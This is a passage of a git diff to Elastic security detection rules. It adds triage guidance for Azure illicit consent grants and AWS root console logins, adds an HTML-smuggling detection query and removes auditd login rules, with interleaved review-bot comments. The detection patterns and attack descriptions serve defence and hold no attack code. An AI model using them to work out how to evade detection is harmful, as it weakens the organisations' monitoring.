+ "note": "## Triage and analysis\n\n### Investigating Possible Consent Grant Attack via Azure-Registered Application\n\nIn an illicit consent grant attack, the attacker creates an Azure-registered application that requests access to data\nsuch as contact information, email, or documents. The attacker then tricks an end user into granting that application\nconsent to access their data either through a phishing attack, or by injecting illicit code into a trusted website.\nAfter the illicit application has been granted consent, it has account-level access to data without the need for an\norganizational account. 
Normal remediation steps like resetting passwords for breached accounts or requiring multi-factor\nauthentication (MFA) on accounts are not effective against this type of attack, since these are third-party applications\nand are external to the organization.\n\nOfficial Microsoft guidance for detecting and remediating this attack can be found [here](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants).\n\n#### Possible investigation steps\n\n- From the Azure AD portal, Review the application that was granted permissions:\n - Click on the `Review permissions` button on the `Permissions` blade of the application.\n - An app should require only permissions related to the app's purpose. If that's not the case, the app might be risky.\n - Apps that require high privileges or admin consent are more likely to be risky.\n- Investigate the app and the publisher. The following characteristics can indicate suspicious apps:\n - A low number of downloads.\n - Low rating or score or bad comments.\n - Apps with a suspicious publisher or website.\n - Apps whose last update is not recent. This might indicate an app that is no longer supported.\n- Export and examine the [Oauth app auditing](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#oauth-app-auditing) to identify users affected.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Malicious applications abuse the same workflow used by legitimate apps.\nThus, analysts must review each app consent to ensure that only desired apps are granted access.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Disable the malicious application to stop user access and the application access to your data.\n- Revoke the application Oauth consent grant. The `Remove-AzureADOAuth2PermissionGrant` cmdlet can be used to complete\nthis task.\n- Remove the service principal application role assignment. The `Remove-AzureADServiceAppRoleAssignment` cmdlet can be\nused to complete this task.\n- Revoke the refresh token for all users assigned to the application. Azure provides a [playbook](https://github.com/Azure/Azure-Sentinel/tree/master/Playbooks/Revoke-AADSignInSessions) for this task.\n- [Report](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#send-feedback) the application as malicious to Microsoft.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Investigate the potential for data compromise from the user's email and file sharing services. 
Activate your Data Loss\nincident response playbook.\n- Disable the permission for a user to set consent permission on their behalf.\n - Enable the [Admin consent request](https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/configure-admin-consent-workflow) feature. \n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.dataset:(azure.activitylogs or azure.auditlogs or o365.audit) and\n (\n azure.activitylogs.operation_name:\"Consent to application\" or\n azure.auditlogs.operation_name:\"Consent to application\" or\n o365.audit.Operation:\"Consent to application.\"\n ) and\n event.outcome:(Success or success)\n", "references": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide" + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide", + "https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/", + "https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + }, + { + "package": "azure", + "version": "0.12.0" + }, + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Operation", + "type": "keyword" + } ], "risk_score": 47, "rule_id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38", + "setup": 
"The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -68,5 +113,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_console_login_root.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_console_login_root.json index 346f679b6c570..5e885b6a69eb7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_console_login_root.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_console_login_root.json 
@@ -15,14 +15,49 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Management Console Root Login", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS Management Console Root Login\n\nThe AWS root account is the one identity that has complete access to all AWS services and resources in the account,\nwhich is created when the AWS account is created. AWS strongly recommends that you do not use the root user for your\neveryday tasks, even the administrative ones. Instead, adhere to the best practice of using the root user only to create\nyour first IAM user. Then securely lock away the root user credentials and use them to perform only a few account and\nservice management tasks. AWS provides a [list of the tasks that require root user](https://docs.aws.amazon.com/general/latest/gr/root-vs-iam.html#aws_tasks-that-require-root).\n\nThis rule looks for attempts to log in to the AWS Management Console as the root user.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Examine whether this activity is common in the environment by looking for past occurrences on your logs.\n- Consider the source IP address and geolocation for the calling user who issued the command. 
Do they look normal for the\n calling user?\n- Examine the commands, API calls, and data management actions performed by the account in the last 24 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking access to servers,\nservices, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- The alert can be dismissed if this operation is done under change management and approved according to the\norganization's policy for performing a task that needs this privilege level.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Identify the services or servers involved criticality.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify if there are any regulatory or legal ramifications related to this activity.\n- Configure multi-factor authentication for the user.\n- Follow security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:signin.amazonaws.com and event.action:ConsoleLogin and aws.cloudtrail.user_identity.type:Root and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" ], - "risk_score": 73, + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" 
+ } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, "rule_id": "e2a67480-3b79-403d-96e3-fdd2992c50ef", - "severity": "high", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", "tags": [ "Elastic", "Cloud", @@ -65,5 +100,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_evasion_suspicious_htm_file_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_evasion_suspicious_htm_file_creation.json new file mode 100644 index 0000000000000..0f662ed769deb --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_evasion_suspicious_htm_file_creation.json 
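Review bot: The hunk lowers a successful root console login from `"risk_score": 73` / `"severity": "high"` to `"risk_score": 47` / `"severity": "medium"` without any rationale in the change, yet the new triage note itself states the root identity has complete access to every service and resource in the account; an interactive root sign-in is about the highest-impact single event CloudTrail can report, so I would keep the high rating or record in the commit why it was reduced. In the response section, `- Configure multi-factor authentication for the user.` reads as copied from an IAM-user template — for this rule the concrete step is to enforce MFA on the root account itself and to delete or rotate any root access keys, and the investigation steps should tell the analyst to check whether the ConsoleLogin event shows MFA was used (presumably exposed in the event's additional event data; verify the exact field in the CloudTrail integration), since that is what separates a policy-compliant break-glass login from a password-only compromise. The step `Consider the source IP address and geolocation for the calling user who issued the command` also talks about a command, but the event this rule matches is a sign-in.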
@@ -0,0 +1,126 @@ +{ + "author": [ + "Elastic" + ], + "description": "Identifies the execution of a browser process to open an HTML file with high entropy and size. Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious HTML File Creation", + "note": "", + "query": "sequence by user.id with maxspan=5m\n [file where event.action in (\"creation\", \"rename\") and\n file.extension : (\"htm\", \"html\") and\n file.path : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*\") and\n ((file.Ext.entropy >= 5 and file.size >= 150000) or file.size >= 1000000)]\n [process where event.action == \"start\" and\n (\n (process.name in (\"chrome.exe\", \"msedge.exe\", \"brave.exe\", \"whale.exe\", \"browser.exe\", \"dragon.exe\", \"vivaldi.exe\", \"opera.exe\")\n and process.args == \"--single-argument\") or\n (process.name == \"iexplore.exe\" and process.args_count == 2) or\n (process.name in (\"firefox.exe\", \"waterfox.exe\") and process.args == \"-url\")\n )\n and process.args : (\"?:\\\\Users\\\\*\\\\Downloads\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\Content.Outlook\\\\*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Temp?_*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\7z*.htm*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\Rar$*.htm*\")]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.entropy", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", 
+ "type": "keyword" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f0493cb4-9b15-43a9-9359-68c23a7f2cf3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Windows", + "Threat Detection", + "Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/", + "subtechnique": [ + { + "id": "T1027.006", + "name": "HTML Smuggling", + "reference": "https://attack.mitre.org/techniques/T1027/006/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 2 +} 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_external_guest_user_invite.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_external_guest_user_invite.json index 70c3ea5de73f9..6dc773a88b931 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_external_guest_user_invite.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_external_guest_user_invite.json @@ -14,13 +14,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure External Guest User Invitation", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Invite external user\" and azure.auditlogs.properties.target_resources.*.display_name:guest and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/governance/policy/samples/cis-azure-1-1-0" ], + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.properties.target_resources.*.display_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "141e9b3a-ff37-4756-989d-05d7cbf35b0e", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", 
@@ -64,5 +93,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_gcp_iam_custom_role_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_gcp_iam_custom_role_creation.json
index 2624371aa5a62..721f785c08f3c 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_gcp_iam_custom_role_creation.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_gcp_iam_custom_role_creation.json
@@ -13,13 +13,37 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP IAM Custom Role Creation",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.iam.admin.v*.CreateRole and event.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateRole and event.outcome:success\n",
 "references": [
 "https://cloud.google.com/iam/docs/understanding-custom-roles"
 ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "aa8007f0-d1df-49ef-8520-407857594827",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -63,5 +87,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 6
+ "version": 8
 }
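Review bot: The new `query` drops `googlecloud.audit` from the dataset filter (`event.dataset:gcp.audit` replaces `event.dataset:(googlecloud.audit or gcp.audit)`), which silently ends coverage for any deployment still shipping the legacy Filebeat `googlecloud` module dataset, while the new `setup` string still promises compatibility with a Filebeat module. If the legacy dataset is intentionally unsupported now, the setup text should say so, e.g. `The GCP Fleet integration or Filebeat gcp module (dataset gcp.audit) is required to be compatible with this rule.`; otherwise keep the two-valued filter until that module is retired. The `note` field is emptied as well, so unlike the AWS root-login rule in this change this one carries no triage guidance, even though custom-role creation is frequently a first step toward granting an over-broad permission set.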
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_failures.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_failures.json deleted file mode 100644 index 18a201e7638ef..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_failures.json +++ /dev/null @@ -1,61 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies that the maximum number of failed login attempts has been reached for a user.", - "index": [ - "auditbeat-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Auditd Max Failed Login Attempts", - "query": "event.module:auditd and event.action:\"failed-log-in-too-many-times-to\"\n", - "references": [ - "https://github.com/linux-pam/linux-pam/blob/0adbaeb273da1d45213134aa271e95987103281c/modules/pam_faillock/pam_faillock.c#L574" - ], - "risk_score": 47, - "rule_id": "fb9937ce-7e21-46bf-831d-1ad96eac674d", - "severity": "medium", - "tags": [ - "Elastic", - "Host", - "Linux", - "Threat Detection", - "Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 1 -} 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_location.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_location.json deleted file mode 100644 index 3224836eb927a..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_location.json +++ /dev/null @@ -1,61 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies that a login attempt has happened from a forbidden location.", - "index": [ - "auditbeat-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Auditd Login from Forbidden Location", - "query": "event.module:auditd and event.action:\"attempted-log-in-from-unusual-place-to\"\n", - "references": [ - "https://github.com/linux-pam/linux-pam/blob/aac5a8fdc4aa3f7e56335a6343774cc1b63b408d/modules/pam_access/pam_access.c#L412" - ], - "risk_score": 73, - "rule_id": "cab4f01c-793f-4a54-a03e-e5d85b96d7af", - "severity": "high", - "tags": [ - "Elastic", - "Host", - "Linux", - "Threat Detection", - "Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 1 -} 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_sessions.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_sessions.json deleted file mode 100644 index b7a51feb122a1..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_sessions.json +++ /dev/null @@ -1,61 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies that the maximum number login sessions has been reached for a user.", - "index": [ - "auditbeat-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Auditd Max Login Sessions", - "query": "event.module:auditd and event.action:\"opened-too-many-sessions-to\"\n", - "references": [ - "https://github.com/linux-pam/linux-pam/blob/70c32cc6fca51338f92afa58eb75b1107a5c2430/modules/pam_limits/pam_limits.c#L1007" - ], - "risk_score": 47, - "rule_id": "20dc4620-3b68-4269-8124-ca5091e00ea8", - "severity": "medium", - "tags": [ - "Elastic", - "Host", - "Linux", - "Threat Detection", - "Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 1 -} 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_time.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_time.json deleted file mode 100644 index f5ab15fb442f2..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_login_time.json +++ /dev/null @@ -1,61 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies that a login attempt occurred at a forbidden time.", - "index": [ - "auditbeat-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Auditd Login Attempt at Forbidden Time", - "query": "event.module:auditd and event.action:\"attempted-log-in-during-unusual-hour-to\"\n", - "references": [ - "https://github.com/linux-pam/linux-pam/blob/aac5a8fdc4aa3f7e56335a6343774cc1b63b408d/modules/pam_time/pam_time.c#L666" - ], - "risk_score": 47, - "rule_id": "90e28af7-1d96-4582-bf11-9a1eff21d0e5", - "severity": "medium", - "tags": [ - "Elastic", - "Host", - "Linux", - "Threat Detection", - "Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 1 -} 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_policy_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_policy_deletion.json index defd5ce4da497..009e4b1eafa30 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_policy_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_policy_deletion.json 
@@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Anti-Phish Policy Deletion", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-AntiPhishPolicy\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishpolicy?view=exchange-ps", "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/set-up-anti-phishing-policies?view=o365-worldwide" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_rule_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_rule_mod.json index 9a14545f39745..8f55ff5266b5c 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_rule_mod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_anti_phish_rule_mod.json @@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Anti-Phish Rule Modification", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-AntiPhishRule\" or \"Disable-AntiPhishRule\") and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishrule?view=exchange-ps", "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-antiphishrule?view=exchange-ps" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "97314185-2568-4561-ae81-f3e480e5e695", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_safelinks_disabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_safelinks_disabled.json index eafb3b71584e2..b91b134f04b31 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_safelinks_disabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/initial_access_microsoft_365_exchange_safelinks_disabled.json 
@@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Safe Link Policy Disabled", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Disable-SafeLinksRule\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-safelinksrule?view=exchange-ps", "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/atp-safe-links?view=o365-worldwide" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "a989fa1b-9a11-4dd8-a3e9-f0de9c6eb5f2", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, 